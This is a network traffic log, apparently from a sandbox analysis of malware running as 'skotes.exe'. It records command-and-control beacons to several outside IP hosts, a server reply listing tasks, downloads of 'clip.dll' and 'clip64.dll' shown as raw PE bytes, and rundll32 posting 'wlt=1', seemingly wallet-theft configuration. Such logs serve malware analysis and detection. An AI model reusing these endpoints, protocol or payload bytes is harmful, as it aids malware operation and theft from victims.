Nov 10, 2024 04:55:31.346158981 CET	1236	IN	Data Raw: 21 7d 71 bf 6a fc 70 57 50 fc bd 83 23 1b 4d 3f bb 3d 34 57 30 cd 58 1d ff 99 82 22 f8 b1 1a 47 22 7d 71 bf 4a fc 70 57 50 fc bd 83 23 1b 7d 3f 7b 3d 34 57 30 d5 58 1d ff 99 a2 22 f8 b1 1a 27 22 7d 71 bf aa fc 70 57 50 fc bd 83 23 1b 7d 3f 6b 3d Data Ascii: !}qjpWP#M?=4W0X"G"}qJpWP#}?{=4W0X"'"}qpWP#}?k=4W0D""}qpWP#)?=4W0]B"g#}qpWP#e?>4W0YK"#}qpWP#y?>4W0F""#}q*pWP#y?>4W0aDB",}qpWP#u?>4
Nov 10, 2024 04:55:31.346178055 CET	548	IN	Data Raw: 30 5d 5d 1d ff 99 42 3e f8 b1 1a 07 d0 7d 71 bf 0a f7 70 57 50 fc bd 83 23 1b 75 3f 4f 3f 34 57 30 95 40 1d ff 99 62 3e f8 b1 1a e7 d0 7d 71 bf 6a f7 70 57 50 fc bd 83 23 1b 7d 3f 77 3f 34 57 30 8d 40 1d ff 99 82 3f f8 b1 1a 47 d1 7d 71 bf 4a f7 Data Ascii: 0]]B>}qpWP#u?O?4W0@b>}qjpWP#}?w?4W0@?G}qJpWP#u?g?4W0C?'}qpWP#u?o?4W0_?}qpWP#u??4W05E?g}qpWP#y??4W0F?}qpWP#u??4W0-C"?}q*p
Nov 10, 2024 04:55:31.346191883 CET	1236	IN	Data Raw: ff 99 62 3c f8 b1 1a e7 de 7d 71 bf 6a f5 70 57 50 fc bd 83 23 1b 75 3f 7b 38 34 57 30 15 5c 1d ff 99 82 3d f8 b1 1a 47 df 7d 71 bf 4a f5 70 57 50 fc bd 83 23 1b 69 3f 63 38 34 57 30 05 42 1d ff 99 a2 3d f8 b1 1a 27 df 7d 71 bf aa f5 70 57 50 fc Data Ascii: b<}qjpWP#u?{84W0\=G}qJpWP#i?c84W0B='}qpWP#a?84W0]=}qpWP#y?384W0C=g}qpWP#y?'84W0A=}qpWP#y?+84W0eE"=}q*pWP#a?84W0CB=}qpWP
Nov 10, 2024 04:55:31.346203089 CET	1236	IN	Data Raw: 23 1b 61 3f d7 24 34 57 30 2d 5e 1d ff 99 42 39 f8 b1 1a 07 cd 7d 71 bf 0a c8 70 57 50 fc bd 83 23 1b 75 3f c3 24 34 57 30 05 47 1d ff 99 62 39 f8 b1 1a e7 cd 7d 71 bf 6a c8 70 57 50 fc bd 83 23 1b 69 3f cb 24 34 57 30 3d 47 1d ff 99 82 36 f8 b1 Data Ascii: #a?$4W0-^B9}qpWP#u?$4W0Gb9}qjpWP#i?$4W0=G6G}qJpWP#Q?%4W0F6'}qpWP#}?%4W0\6}qpWP#}?%4W0M@6g}qpWP#y?%4W0^6}qpWP#e?_%4W0A"6
Nov 10, 2024 04:55:31.346214056 CET	1236	IN	Data Raw: 7a fd 79 c0 25 17 2c 99 fb b1 be 83 23 26 30 5b 26 b2 e6 5a a4 b1 22 bf 1a ae 77 57 50 fc bd 83 23 e5 bd 83 23 e5 bd 83 23 e5 bd 83 23 24 38 5b 37 75 f0 1a ff 3e b8 44 a4 f2 b6 83 23 6e fe a3 55 24 80 c2 a5 bd bb 5d 6b be 35 57 af 99 1c 4a fa b1 Data Ascii: zy%,#&0[&Z"wWP####$8[7u>D#nU$]k5WJ4_~!or;][+bDru"VK5W:##bhr:##nU_b+"pWzy%,##nU$_hE]VoXhr;]####nA
Nov 10, 2024 04:55:31.351078033 CET	1236	IN	Data Raw: d7 b1 72 57 ff 26 3a 5b 26 7e ad 44 ff b1 72 07 6c 7e 95 9d a4 f9 71 07 60 66 95 9d a4 99 70 bf 5b a1 77 57 62 6e dd d8 3b b9 bb 5c 7f bf 35 57 7a 8b 61 29 87 24 3c cf b9 24 b0 d6 f1 b1 62 57 ff 03 61 c0 a0 b5 f6 99 9a 44 b0 d8 3f b5 f6 af 9e 08 Data Ascii: rW&:[&~Drl~q`fp[wWbn;\5Wza)$<$bWaD?6$>_b$>C&]$<[:\|Wr^LpWb,Cr####nU$]k5W\G4_~!o"r;][nA`}q;rWaoKq

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	50104	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:56:03.649832010 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 10, 2024 04:56:04.556771994 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:56:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	50116	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:56:06.075719118 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 10, 2024 04:56:06.993849039 CET	806	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:56:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 36 37 0d 0a 20 3c 63 3e 31 30 30 35 32 30 33 30 31 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 63 64 65 30 61 31 39 63 35 31 39 39 31 38 30 33 38 65 35 66 66 31 34 62 34 64 34 32 34 36 64 37 64 66 65 38 31 31 61 32 65 33 64 30 35 63 32 32 62 39 32 35 37 61 63 64 30 38 39 65 64 31 23 31 30 30 35 32 30 34 30 31 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 63 64 65 30 61 31 39 63 35 31 39 39 31 38 30 33 38 65 35 66 66 31 34 62 34 64 34 32 34 36 64 37 64 66 65 38 31 31 61 32 66 62 38 30 31 65 32 61 65 66 37 33 37 61 62 61 35 33 62 61 64 65 37 63 63 63 23 31 30 30 35 32 31 37 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 65 37 65 37 62 39 63 61 33 30 38 30 34 30 34 32 62 61 35 63 65 39 [TRUNCATED] Data Ascii: 267 <c>1005203011+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8cde0a19c519918038e5ff14b4d4246d7dfe811a2e3d05c22b9257acd089ed1#1005204011+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8cde0a19c519918038e5ff14b4d4246d7dfe811a2fb801e2aef737aba53bade7ccc#1005217001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e7e7b9ca30804042ba5ce902415450#1005218001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb410a494d9d#1005219031+++b5937c1a99d5f9dd0246b5cb4f6522427fae1daa8e9eb4fff7b5c630804042ba5ce902415450#1005220001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e4f4b2846d934f48b15eaa495c49#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	50122	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:56:07.002392054 CET	64	OUT	GET /Fru7Nk9/Plugins/clip.dll HTTP/1.1 Host: 185.215.113.16
Nov 10, 2024 04:56:07.905119896 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:56:07 GMT Content-Type: application/octet-stream Content-Length: 126976 Last-Modified: Fri, 08 Nov 2024 09:03:51 GMT Connection: keep-alive ETag: "672dd3f7-1f000" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c8 f9 ef 50 8c 98 81 03 8c 98 81 03 8c 98 81 03 98 f3 82 02 86 98 81 03 98 f3 84 02 05 98 81 03 98 f3 85 02 9e 98 81 03 de ed 85 02 83 98 81 03 de ed 82 02 9d 98 81 03 de ed 84 02 ad 98 81 03 98 f3 80 02 8b 98 81 03 8c 98 80 03 ed 98 81 03 40 ed 88 02 8f 98 81 03 40 ed 81 02 8d 98 81 03 40 ed 7e 03 8d 98 81 03 40 ed 83 02 8d 98 81 03 52 69 63 68 8c 98 81 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 4a b8 2d 67 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 1d 00 44 01 00 00 b4 00 00 00 00 00 00 62 70 00 00 00 10 00 00 00 60 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$P@@@~@RichPELJ-g!Dbp`0@lPD8@`L.textCD `.rdatat`vH@@.data@.rsrc@@.reloc@B
Nov 10, 2024 04:56:07.905379057 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6a 20 68 98 ae 01 10 b9 60 e8 01 10 e8 7f 4d 00 00 68 70 29 01 10 e8 ea 5a 00 00 Data Ascii: j h`Mhp)ZYj hx_Mh)ZYjh?Mh0ZYj hMhZYjhLh*jZYjh$LhP+JZY
Nov 10, 2024 04:56:07.905390024 CET	1236	IN	Data Raw: cc cc cc 6a 0c 68 10 b2 01 10 b9 d8 eb 01 10 e8 df 48 00 00 68 50 37 01 10 e8 4a 56 00 00 59 c3 cc cc cc 6a 24 68 20 b2 01 10 b9 f0 eb 01 10 e8 bf 48 00 00 68 b0 37 01 10 e8 2a 56 00 00 59 c3 cc cc cc 6a 10 68 48 b2 01 10 b9 08 ec 01 10 e8 9f 48 Data Ascii: jhHhP7JVYj$h Hh7*VYjhHHh8VYjh\ Hhp8UYjhh8_Hh8UYjhtP?Hh09UYjhhHh9UYjh=G
Nov 10, 2024 04:56:07.905400991 CET	636	IN	Data Raw: 68 90 45 01 10 e8 8a 51 00 00 59 c3 cc cc cc 6a 38 68 a4 b5 01 10 b9 80 ef 01 10 e8 ff 43 00 00 68 f0 45 01 10 e8 6a 51 00 00 59 c3 cc cc cc 6a 0c 68 e0 b5 01 10 b9 98 ef 01 10 e8 df 43 00 00 68 50 46 01 10 e8 4a 51 00 00 59 c3 cc cc cc 6a 34 68 Data Ascii: hEQYj8hChEjQYjhChPFJQYj4hChF*QYj,h(ChGQYjhXChpGPYj4hh_ChGPYj(h?Ch0HPYjh
Nov 10, 2024 04:56:07.905411959 CET	1236	IN	Data Raw: 9f 41 00 00 68 10 4d 01 10 e8 0a 4f 00 00 59 c3 cc cc cc 6a 38 68 c4 b8 01 10 b9 60 f1 01 10 e8 7f 41 00 00 68 70 4d 01 10 e8 ea 4e 00 00 59 c3 cc cc cc 6a 30 68 00 b9 01 10 b9 78 f1 01 10 e8 5f 41 00 00 68 d0 4d 01 10 e8 ca 4e 00 00 59 c3 cc cc Data Ascii: AhMOYj8h`AhpMNYj0hx_AhMNYjTh8?Ah0NNYj,hAhNNYjh@hNjNYjh@hPOJNYhO;NYhP+NY
Nov 10, 2024 04:56:07.905421972 CET	1236	IN	Data Raw: 85 78 fb ff ff 8b 8d bc fb ff ff 39 8d 88 fb ff ff c7 85 90 fb ff ff 00 00 00 00 0f 42 8d 88 fb ff ff 83 bd 8c fb ff ff 10 51 0f 43 85 78 fb ff ff 8d 8d 90 fb ff ff 50 c7 85 a0 fb ff ff 00 00 00 00 c7 85 a4 fb ff ff 0f 00 00 00 c6 85 90 fb ff ff Data Ascii: x9BQCxPw<EC+QR;w41CVp0QAEr+H
Nov 10, 2024 04:56:07.905432940 CET	1236	IN	Data Raw: 01 c7 45 cc 00 00 00 00 c7 45 dc 00 00 00 00 88 88 d8 fe 01 10 8d 4d cc 0f b6 86 d8 fe 01 10 03 c2 c7 45 e0 0f 00 00 00 0f b6 c0 c6 45 cc 00 0f b6 80 d8 fe 01 10 88 45 ef 8d 45 ef 50 e8 b9 37 00 00 8d 45 cc c7 45 fc 00 00 00 00 50 ba 20 f2 01 10 Data Ascii: EEMEEEEP7EEP M8 t\|4r. ArP#+QPmA04 ~Ff0FFUr(MB
Nov 10, 2024 04:56:07.905445099 CET	1236	IN	Data Raw: 00 c6 45 08 00 83 fa 10 72 28 8b 4d 20 42 8b c1 81 fa 00 10 00 00 72 10 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 77 1e 52 51 e8 07 3d 00 00 83 c4 08 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 e8 28 6f 00 00 cc cc cc cc cc cc cc Data Ascii: Er(M BrI#+wRQ=MdY_^[](oUjhV$dP,3ESVWPEdU]]ECCEWfEEhEEEEEy<E
Nov 10, 2024 04:56:07.905456066 CET	1236	IN	Data Raw: 10 72 2c 8b 4d d8 42 8b c1 81 fa 00 10 00 00 72 14 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 86 00 00 00 52 51 e8 36 38 00 00 83 c4 08 8b 55 d4 83 fa 10 72 28 8b 4d c0 42 8b c1 81 fa 00 10 00 00 72 10 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 Data Ascii: r,MBrI#+RQ68Ur(MBrI#+wVRQ8Ur(MBrI#+w&RQ7MdY^M37]iUjh$dP03ESVWPEduuEE
Nov 10, 2024 04:56:07.905468941 CET	1236	IN	Data Raw: 8b ec 6a ff 68 a6 25 01 10 64 a1 00 00 00 00 50 83 ec 1c 53 56 57 a1 08 e0 01 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b f1 89 75 ec 89 75 d8 c7 45 e8 00 00 00 00 c7 45 fc 01 00 00 00 8b 7d 18 6a 00 c7 06 00 00 00 00 c7 46 10 00 00 00 00 c7 46 14 Data Ascii: jh%dPSVW3PEduuEE}jFFh=})3E~i}ENCE~UB<w U;ruEu';sAFrDuEuQ,C;]\|Ur(MBr
Nov 10, 2024 04:56:07.910324097 CET	1236	IN	Data Raw: 89 75 ec 85 f6 0f 84 91 01 00 00 56 ff 15 04 60 01 10 89 45 e4 85 c0 0f 84 78 01 00 00 6a 00 6a 00 6a 00 6a 00 6a ff 50 6a 00 68 e9 fd 00 00 ff 15 0c 60 01 10 8b c8 89 4d f0 85 c9 0f 8e 53 01 00 00 8b 47 10 8d 51 01 89 45 e8 3b d0 77 13 89 57 10 Data Ascii: uV`ExjjjjjPjh`MSGQE;wWrO+G+EM;w*WruQjVCEuQQEuQ(MrjjQPjujh`MIE9OEBO

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	50123	185.215.113.209	80	8264	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:56:08.595316887 CET	157	OUT	POST /Fru7Nk9/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.209 Content-Length: 5 Cache-Control: no-cache Data Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Nov 10, 2024 04:56:09.498413086 CET	719	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:56:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 31 30 0d 0a 20 2b 2b 2b 5f 31 5f 39 64 33 66 64 38 30 32 31 38 32 64 63 31 35 61 33 34 61 31 39 37 62 36 66 63 64 34 36 61 62 39 38 65 36 30 30 63 62 64 61 65 36 64 33 64 35 33 39 34 39 38 66 31 30 32 35 61 62 38 37 61 65 37 30 32 37 31 30 30 39 32 31 66 65 37 61 36 36 61 64 66 35 66 2d 31 2d 5f 32 5f 63 66 32 34 64 31 34 61 32 65 37 32 38 66 36 39 36 36 66 62 63 34 66 64 62 61 63 36 33 65 38 38 64 38 33 39 35 39 66 62 66 65 36 30 34 64 30 64 64 38 39 32 66 31 33 33 35 63 65 63 32 64 39 33 35 33 32 33 35 33 63 39 35 38 62 32 64 30 36 36 64 38 32 63 2d 32 2d 5f 33 5f 62 33 33 38 62 30 30 30 31 62 31 36 63 39 31 61 36 64 61 32 61 35 66 66 64 36 65 39 34 35 39 39 39 65 33 35 30 32 61 64 61 62 36 32 37 64 30 30 38 62 64 39 38 31 33 34 30 36 62 33 37 35 65 36 32 66 33 34 2d 33 2d 5f 34 5f 62 62 31 65 38 33 30 39 30 64 32 37 64 32 31 66 37 36 61 34 39 63 38 30 64 64 63 35 35 65 38 61 61 31 30 61 30 66 38 32 63 64 32 32 35 32 30 30 39 64 63 31 61 36 33 62 31 37 39 37 35 61 62 36 30 39 32 34 2d 34 2d 5f [TRUNCATED] Data Ascii: 210 +++_1_9d3fd802182dc15a34a197b6fcd46ab98e600cbdae6d3d539498f1025ab87ae7027100921fe7a66adf5f-1-_2_cf24d14a2e728f6966fbc4fdbac63e88d83959fbfe604d0dd892f1335cec2d93532353c958b2d066d82c-2-_3_b338b0001b16c91a6da2a5ffd6e945999e3502adab627d008bd9813406b375e62f34-3-_4_bb1e83090d27d21f76a49c80ddc55e8aa10a0f82cd2252009dc1a63b17975ab60924-4-_5_cb6e9311310c8e4379abc0a5c8f445fa85202ea2cd644c67acdd8c1d29802fad530917bf35e9df7fbb222d5a864a590c4cb89946377e3495e61b5cee99c1e7e2f3acbb7efa33ae2709267151cf0cd6291f8143482349f9acf21b3d784e272d-5-0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	50124	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:56:10.000061989 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 35 32 30 33 30 31 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005203011&unit=246122658369
Nov 10, 2024 04:56:10.922723055 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:56:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	50125	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:56:10.929786921 CET	66	OUT	GET /Fru7Nk9/Plugins/clip64.dll HTTP/1.1 Host: 185.215.113.16
Nov 10, 2024 04:56:11.875849009 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:56:11 GMT Content-Type: application/octet-stream Content-Length: 126976 Last-Modified: Fri, 08 Nov 2024 09:03:51 GMT Connection: keep-alive ETag: "672dd3f7-1f000" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c8 f9 ef 50 8c 98 81 03 8c 98 81 03 8c 98 81 03 98 f3 82 02 86 98 81 03 98 f3 84 02 05 98 81 03 98 f3 85 02 9e 98 81 03 de ed 85 02 83 98 81 03 de ed 82 02 9d 98 81 03 de ed 84 02 ad 98 81 03 98 f3 80 02 8b 98 81 03 8c 98 80 03 ed 98 81 03 40 ed 88 02 8f 98 81 03 40 ed 81 02 8d 98 81 03 40 ed 7e 03 8d 98 81 03 40 ed 83 02 8d 98 81 03 52 69 63 68 8c 98 81 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 4a b8 2d 67 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 1d 00 44 01 00 00 b4 00 00 00 00 00 00 62 70 00 00 00 10 00 00 00 60 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$P@@@~@RichPELJ-g!Dbp`0@lPD8@`L.textCD `.rdatat`vH@@.data@.rsrc@@.reloc@B
Nov 10, 2024 04:56:11.875884056 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6a 20 68 98 ae 01 10 b9 60 e8 01 10 e8 7f 4d 00 00 68 70 29 01 10 e8 ea 5a 00 00 Data Ascii: j h`Mhp)ZYj hx_Mh)ZYjh?Mh0ZYj hMhZYjhLh*jZYjh$LhP+JZY
Nov 10, 2024 04:56:11.875890970 CET	1236	IN	Data Raw: cc cc cc 6a 0c 68 10 b2 01 10 b9 d8 eb 01 10 e8 df 48 00 00 68 50 37 01 10 e8 4a 56 00 00 59 c3 cc cc cc 6a 24 68 20 b2 01 10 b9 f0 eb 01 10 e8 bf 48 00 00 68 b0 37 01 10 e8 2a 56 00 00 59 c3 cc cc cc 6a 10 68 48 b2 01 10 b9 08 ec 01 10 e8 9f 48 Data Ascii: jhHhP7JVYj$h Hh7*VYjhHHh8VYjh\ Hhp8UYjhh8_Hh8UYjhtP?Hh09UYjhhHh9UYjh=G
Nov 10, 2024 04:56:11.875897884 CET	1236	IN	Data Raw: 68 90 45 01 10 e8 8a 51 00 00 59 c3 cc cc cc 6a 38 68 a4 b5 01 10 b9 80 ef 01 10 e8 ff 43 00 00 68 f0 45 01 10 e8 6a 51 00 00 59 c3 cc cc cc 6a 0c 68 e0 b5 01 10 b9 98 ef 01 10 e8 df 43 00 00 68 50 46 01 10 e8 4a 51 00 00 59 c3 cc cc cc 6a 34 68 Data Ascii: hEQYj8hChEjQYjhChPFJQYj4hChF*QYj,h(ChGQYjhXChpGPYj4hh_ChGPYj(h?Ch0HPYjh
Nov 10, 2024 04:56:11.880686045 CET	1236	IN	Data Raw: f1 0f 57 c0 8d 46 04 50 c7 06 54 63 01 10 66 0f d6 00 8b 45 08 83 c0 04 50 e8 29 5c 00 00 83 c4 08 c7 06 b4 63 01 10 8b c6 5e 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 56 8b f1 0f 57 c0 8d 46 04 50 c7 06 54 63 01 10 66 0f d6 00 Data Ascii: WFPTcfEP)\c^]UVWFPTcfEP[`c^]hHUjh)#dP\|3EVWPEdE}}0}H
Nov 10, 2024 04:56:11.880703926 CET	1236	IN	Data Raw: 00 83 f8 10 72 31 8b 8d d8 fb ff ff 8d 50 01 8b c1 81 fa 00 10 00 00 72 14 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 a9 01 00 00 52 51 e8 52 44 00 00 83 c4 08 8b 55 1c c7 85 e8 fb ff ff 00 00 00 00 c7 85 ec fb ff ff 0f 00 00 00 c6 85 d8 fb Data Ascii: r1PrI#+RQRDUr,MBrI#+ZRQDU4EEEr,M BrI#+RQCULE0E4E M8B
Nov 10, 2024 04:56:11.880718946 CET	672	IN	Data Raw: c7 45 dc 0f 00 00 00 c6 45 c8 00 e8 93 35 00 00 8d 45 c8 c7 45 fc 01 00 00 00 50 8b d7 8d 4d ac e8 ce 36 00 00 83 c4 04 89 45 e8 3b f8 74 68 8b 4f 14 83 f9 10 72 2e 8b 07 41 81 f9 00 10 00 00 72 16 8b 50 fc 83 c1 23 2b c2 83 c0 fc 83 f8 1f 0f 87 Data Ascii: EE5EEPM6E;thOr.ArP#+QPS?EGG~@fG@@Ur(MBrI#+w~RQ>EUEEEr(MBr
Nov 10, 2024 04:56:11.880729914 CET	1236	IN	Data Raw: f8 1f 77 1e 52 51 e8 07 3d 00 00 83 c4 08 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 e8 28 6f 00 00 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 56 24 01 10 64 a1 00 00 00 00 50 83 ec 2c a1 08 e0 01 10 33 c5 89 45 f0 53 Data Ascii: wRQ=MdY_^[](oUjhV$dP,3ESVWPEdU]]ECCEWfEEhEEEEEy<EE}Mu;uh
Nov 10, 2024 04:56:11.885371923 CET	1236	IN	Data Raw: 00 52 51 e8 36 38 00 00 83 c4 08 8b 55 d4 83 fa 10 72 28 8b 4d c0 42 8b c1 81 fa 00 10 00 00 72 10 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 77 56 52 51 e8 06 38 00 00 83 c4 08 8b 55 1c 83 fa 10 72 28 8b 4d 08 42 8b c1 81 fa 00 10 00 00 72 10 8b Data Ascii: RQ68Ur(MBrI#+wVRQ8Ur(MBrI#+w&RQ7MdY^M37]iUjh$dP03ESVWPEduuEEEFFM
Nov 10, 2024 04:56:11.885385036 CET	1236	IN	Data Raw: 00 00 00 8b f1 89 75 ec 89 75 d8 c7 45 e8 00 00 00 00 c7 45 fc 01 00 00 00 8b 7d 18 6a 00 c7 06 00 00 00 00 c7 46 10 00 00 00 00 c7 46 14 0f 00 00 00 68 3d af 01 10 89 7d ec c6 06 00 e8 19 29 00 00 33 db c7 45 e8 01 00 00 00 85 ff 7e 69 83 7d 1c Data Ascii: uuEE}jFFh=})3E~i}ENCE~UB<w U;ruEu';sAFrDuEuQ,C;]\|Ur(MBrI#+wRQ2Md
Nov 10, 2024 04:56:11.885396004 CET	1236	IN	Data Raw: 00 6a ff 50 6a 00 68 e9 fd 00 00 ff 15 0c 60 01 10 8b c8 89 4d f0 85 c9 0f 8e 53 01 00 00 8b 47 10 8d 51 01 89 45 e8 3b d0 77 13 89 57 10 8b c7 83 7f 14 10 72 02 8b 07 c6 04 10 00 eb 4f 8b ca 2b c8 8b 47 14 2b 45 e8 89 4d dc 3b c8 77 2a 83 7f 14 Data Ascii: jPjh`MSGQE;wWrO+G+EM;w*WruQjVCEuQQEuQ(MrjjQPjujh`MIE9OEBOErQPM#E;tWOr+

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	50126	185.215.113.209	80	8236	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:56:12.894201994 CET	157	OUT	POST /Fru7Nk9/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.209 Content-Length: 5 Cache-Control: no-cache Data Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
